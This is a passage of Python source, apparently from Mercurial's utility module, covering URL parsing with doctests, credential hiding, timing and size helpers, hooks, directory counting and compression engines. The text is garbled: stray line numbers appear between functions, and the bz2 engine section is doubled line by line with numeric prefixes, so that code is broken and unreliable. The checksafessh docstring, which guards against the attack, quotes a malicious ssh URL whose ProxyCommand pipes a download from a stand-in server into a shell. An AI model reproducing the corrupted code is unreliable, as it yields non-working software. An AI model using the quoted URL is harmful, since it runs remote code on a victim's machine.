    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters never %-escaped in user/passwd components (see __bytes__)
    _safechars = "!~*'()+"
    # characters never %-escaped in path/fragment components (see __bytes__)
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        """Return a debugging representation listing only the set fields."""
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                # bracketed IPv6 literal: keep the brackets unescaped
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return (url-without-credentials, authinfo-or-None).

        The second element is None when no user is set; otherwise it is
        the (realm, uris, user, passwd) tuple expected by urllib's
        password manager.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily blank out credentials to serialize without them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        """Report whether the URL is absolute: a remote scheme, a drive
        letter, a Windows UNC path, or a POSIX rooted path."""
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        """Return the local filesystem path for file:/bundle: URLs;
        any other URL is returned as the original input string."""
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3117
3118
def hasscheme(path):
    '''Report whether *path* carries an explicit URL scheme.'''
    scheme = url(path).scheme
    return bool(scheme)
3120
3121
def hasdriveletter(path):
    '''Report whether *path* begins with a Windows drive letter
    ("X:"); an empty/None path is returned unchanged (falsy).'''
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3123
3124
def urllocalpath(path):
    '''Return the local filesystem form of *path*, keeping any query
    and fragment text as part of the path.'''
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3126
3127
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    unquoted = urlreq.unquote(path)
    if unquoted.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(unquoted),))
3142
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3148
3149
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # serialize back to bytes like hidepassword() and url.__bytes__ do;
    # str(u) returned a unicode string on Python 3, inconsistent with
    # the rest of the bytes-based URL API
    return bytes(u)
3154
3155
# Human-readable formatter for a duration given in seconds, used by the
# @timed decorator below.  Entries appear to be (threshold, divisor,
# format) triples handed to unitcountfn() — see its definition for the
# exact selection rule; the table spans seconds down to nanoseconds.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

# current indentation depth for nested @timed reports; a one-element
# list so the decorator's wrapper can mutate it in place
_timenesting = [0]
3172
3173
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        begin = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= step
            # report at the (now restored) outer nesting depth
            stderr.write('%s%s: %s\n'
                         % (' ' * _timenesting[0], func.__name__,
                            timecount(duration)))
    return wrapper
3197
3198
# size suffixes accepted by sizetoint(), scanned in order; the bare 'b'
# entry is deliberately last so that 'kb'/'mb'/'gb' match before it
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3200
3201
def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                value = float(spec[:-len(suffix)])
                return int(value * multiplier)
        # no recognized suffix: plain byte count
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3219
3220
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        '''Register *hook* under the name *source*.'''
        self._hooks.append((source, hook))

    def __call__(self, *args):
        '''Invoke every registered hook with *args* and return the list
        of results, ordered by source name.'''
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
3237
3238
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yield lines for a nicely formatted stacktrace.

    Skips the 'skip' last entries, then returns the last 'depth'
    entries. Each file+linenumber is formatted according to
    ``fileline`` and each yielded line according to ``line``. If
    ``line`` is None, tuples of::

        (length of longest filepath+line number,
         filepath+linenumber,
         function)

    are yielded instead of formatted lines.

    Not to be used in production code but very convenient while
    developing.
    '''
    # Drop this frame plus the 'skip' innermost callers.
    frames = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, ln, func, _text in frames:
        location = fileline % (pycompat.sysbytes(fn), ln)
        entries.append((location, pycompat.sysbytes(func)))
    # Note: depth=0 keeps everything ([-0:] is the whole list).
    entries = entries[-depth:]
    if not entries:
        return
    fnmax = max(len(location) for location, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3260
3261
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Write ``msg`` and a nicely formatted stacktrace to ``f`` (stderr).

    Skips the 'skip' entries closest to the call, then shows 'depth'
    entries. By default stdout ('otherf') is flushed first so the trace
    does not interleave with pending output. It can be used everywhere
    and intentionally does not require a ui object. Not to be used in
    production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3275
3276
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> number of paths referencing it
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: ignore entries in state 'skip'
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        """Count every ancestor directory of ``path``."""
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # Once an ancestor is known, all shallower ancestors
                # were already counted when it was first added.
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        """Remove one reference to every ancestor directory of ``path``."""
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                counts[base] -= 1
                return
            # Last reference: forget this directory and keep walking up.
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

# Prefer the C implementation when the parsers extension provides one.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3314
3315
def finddirs(path):
    '''Yield each ancestor directory of ``path``, deepest first.

    ``'a/b/c'`` yields ``'a/b'`` then ``'a'``; a path containing no
    slash yields nothing.
    '''
    sep = path.rfind('/')
    while sep != -1:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3320
3321
# compression code

# Role identifiers used when querying which compression engines are
# supported on the wire protocol (see supportedwireengines()).
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire protocol support: the advertised format
# name plus the server-side and client-side advertisement priorities.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3329
3330
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()
        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        self._registerbundleinfo(name, engine.bundletype())
        self._registerwiresupport(name, engine.wireprotosupport())
        self._registerrevlogheader(name, engine.revlogheader())

        self._engines[name] = engine

    def _registerbundleinfo(self, name, bundleinfo):
        # Record the bundle spec name and internal bundle type mappings.
        if not bundleinfo:
            return
        bundlename, bundletype = bundleinfo

        if bundlename in self._bundlenames:
            raise error.Abort(_('bundle name %s already registered') %
                              bundlename)
        if bundletype in self._bundletypes:
            raise error.Abort(_('bundle type %s already registered by %s') %
                              (bundletype, self._bundletypes[bundletype]))

        # No external facing name declared.
        if bundlename:
            self._bundlenames[bundlename] = name

        self._bundletypes[bundletype] = name

    def _registerwiresupport(self, name, wiresupport):
        # Record the wire protocol identifier mapping.
        if not wiresupport:
            return
        wiretype = wiresupport.name
        if wiretype in self._wiretypes:
            raise error.Abort(_('wire protocol compression %s already '
                                'registered by %s') %
                              (wiretype, self._wiretypes[wiretype]))

        self._wiretypes[wiretype] = name

    def _registerrevlogheader(self, name, revlogheader):
        # Record the revlog header mapping.
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def _loadable(self, name):
        # Resolve an internal engine name to an engine instance,
        # aborting when the engine is known but cannot be loaded.
        engine = self._engines[name]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadable(self._bundlenames[bundlename])

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._loadable(self._bundletypes[bundletype])

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain an available engine registered to a wire identifier."""
        return self._loadable(self._wiretypes[wiretype])

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

# Global registry all engines in this module register against.
compengines = compressormanager()
3485
3486
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Return the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Report whether the compression engine is usable.

        Exists so that optional engines (for example ones relying on C
        extensions that may not be present in all installations) can be
        registered unconditionally and filtered out at lookup time.
        """
        return True

    def bundletype(self):
        """Describe bundle identifiers for this engine.

        Returns None if this compression engine isn't supported for
        bundles.

        Otherwise returns a 2-tuple of strings: the user-facing "bundle
        spec" compression name and an internal identifier used to denote
        the compression format within bundles. To exclude the name from
        external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell
        users about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        Returns None if this compression engine isn't supported for
        compressing wire protocol payloads.

        Otherwise returns a ``compenginewireprotosupport`` with the
        following fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of
        format support by server and client. The highest integer is
        advertised first. Integers with non-positive values aren't
        advertised.

        The priority values are somewhat arbitrary and only used for
        default ordering. The relative order can be changed via config
        options.

        If wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        Should return the bytes used to identify chunks compressed with
        this engine when it can be used to compress revlogs, or ``None``
        to indicate it does not participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        Receives an iterator (ideally a generator) of chunks of bytes to
        be compressed and returns an iterator (ideally a generator) of
        bytes chunks representing the compressed output.

        Optionally accepts an ``opts`` argument defining how to perform
        compression. Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        ``fh`` is an object with a ``read(size)`` method that returns
        compressed data. The return value is an object with a
        ``read(size)`` method that returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data, returning either compressed bytes or ``None`` when the data
        could not be compressed (too small, not compressible, etc). The
        returned data should carry a header uniquely identifying this
        compression format so decompression can be routed to this engine;
        that header should be the ``revlogheader()`` return value.

        The object also has a ``decompress(data)`` method, only called
        when ``data`` begins with ``revlogheader()``, which returns the
        raw uncompressed data or raises a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3602
3603
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            compressed = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if compressed:
                yield compressed

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Below this size the overhead is never worth it.
            if insize < 44:
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            z = zlib.compressobj()
            parts = []
            pos = 0
            while pos < insize:
                pos2 = pos + 2**20
                parts.append(z.compress(data[pos:pos2]))
                pos = pos2
            parts.append(z.flush())

            if sum(map(len, parts)) < insize:
                return ''.join(parts)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3689
3690
3690 class _bz2engine(compressionengine):
3691 class _bz2engine(compressionengine):
3691 def name(self):
3692 def name(self):
3692 return 'bz2'
3693 return 'bz2'
3693
3694
3694 def bundletype(self):
3695 def bundletype(self):
3695 """An algorithm that produces smaller bundles than ``gzip``.
3696 """An algorithm that produces smaller bundles than ``gzip``.
3696
3697
3697 All Mercurial clients should support this format.
3698 All Mercurial clients should support this format.
3698
3699
3699 This engine will likely produce smaller bundles than ``gzip`` but
3700 This engine will likely produce smaller bundles than ``gzip`` but
3700 will be significantly slower, both during compression and
3701 will be significantly slower, both during compression and
3701 decompression.
3702 decompression.
3702
3703
3703 If available, the ``zstd`` engine can yield similar or better
3704 If available, the ``zstd`` engine can yield similar or better
3704 compression at much higher speeds.
3705 compression at much higher speeds.
3705 """
3706 """
3706 return 'bzip2', 'BZ'
3707 return 'bzip2', 'BZ'
3707
3708
3708 # We declare a protocol name but don't advertise by default because
3709 # We declare a protocol name but don't advertise by default because
3709 # it is slow.
3710 # it is slow.
3710 def wireprotosupport(self):
3711 def wireprotosupport(self):
3711 return compewireprotosupport('bzip2', 0, 0)
3712 return compewireprotosupport('bzip2', 0, 0)
3712
3713
3713 def compressstream(self, it, opts=None):
3714 def compressstream(self, it, opts=None):
3714 opts = opts or {}
3715 opts = opts or {}
3715 z = bz2.BZ2Compressor(opts.get('level', 9))
3716 z = bz2.BZ2Compressor(opts.get('level', 9))
3716 for chunk in it:
3717 for chunk in it:
3717 data = z.compress(chunk)
3718 data = z.compress(chunk)
3718 if data:
3719 if data:
3719 yield data
3720 yield data
3720
3721
3721 yield z.flush()
3722 yield z.flush()
3722
3723
3723 def decompressorreader(self, fh):
3724 def decompressorreader(self, fh):
3724 def gen():
3725 def gen():
3725 d = bz2.BZ2Decompressor()
3726 d = bz2.BZ2Decompressor()
3726 for chunk in filechunkiter(fh):
3727 for chunk in filechunkiter(fh):
3727 yield d.decompress(chunk)
3728 yield d.decompress(chunk)
3728
3729
3729 return chunkbuffer(gen())
3730 return chunkbuffer(gen())
3730
3731
# Make the bzip2 engine available through the global registry.
compengines.register(_bz2engine())
3732
3733
class _truncatedbz2engine(compressionengine):
    """bzip2 variant for streams that lack the leading 'BZ' magic bytes."""

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # The None bundle name keeps this engine out of user-facing bundle
        # specifications; only the on-the-wire header is exposed.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def _chunks():
            # The input stream doesn't have the 'BZ' header. So add it back.
            decomp = bz2.BZ2Decompressor()
            decomp.decompress('BZ')
            for block in filechunkiter(fh):
                yield decomp.decompress(block)

        return chunkbuffer(_chunks())
3751
3752
# Make the truncated-bzip2 engine available through the global registry.
compengines.register(_truncatedbz2engine())
3753
3754
class _noopengine(compressionengine):
    """Identity engine: payloads pass through without compression."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    def compressstream(self, it, opts=None):
        # Nothing to do: the input iterator already is the output.
        return it

    def decompressorreader(self, fh):
        # Reading back is likewise the identity operation.
        return fh

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    class nooprevlogcompressor(object):
        def compress(self, data):
            # None means no compressed representation is produced (the same
            # convention zstdrevlogcompressor.compress uses below).
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()
3786
3787
# Make the pass-through engine available through the global registry.
compengines.register(_noopengine())
3788
3789
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled zstd module."""

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # Availability is purely "did the lazy import succeed".
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # Single-byte marker identifying zstd-compressed revlog chunks.
        return '\x28'

    def compressstream(self, it, opts=None):
        """Yield zstd-compressed chunks for the byte chunks in ``it``."""
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        # read_from() yields decompressed chunks streamed from fh
        # (python-zstandard streaming API).
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            """Return compressed bytes, or None if compression isn't a win."""
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small to plausibly benefit from compression.
                return None

            elif insize <= 1000000:
                # One-shot compression for moderate sizes; keep the result
                # only if it is actually smaller than the input.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream large inputs through a compressobj in chunks of the
                # library-recommended input size.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            """Decompress ``data``; wrap any failure in error.RevlogError."""
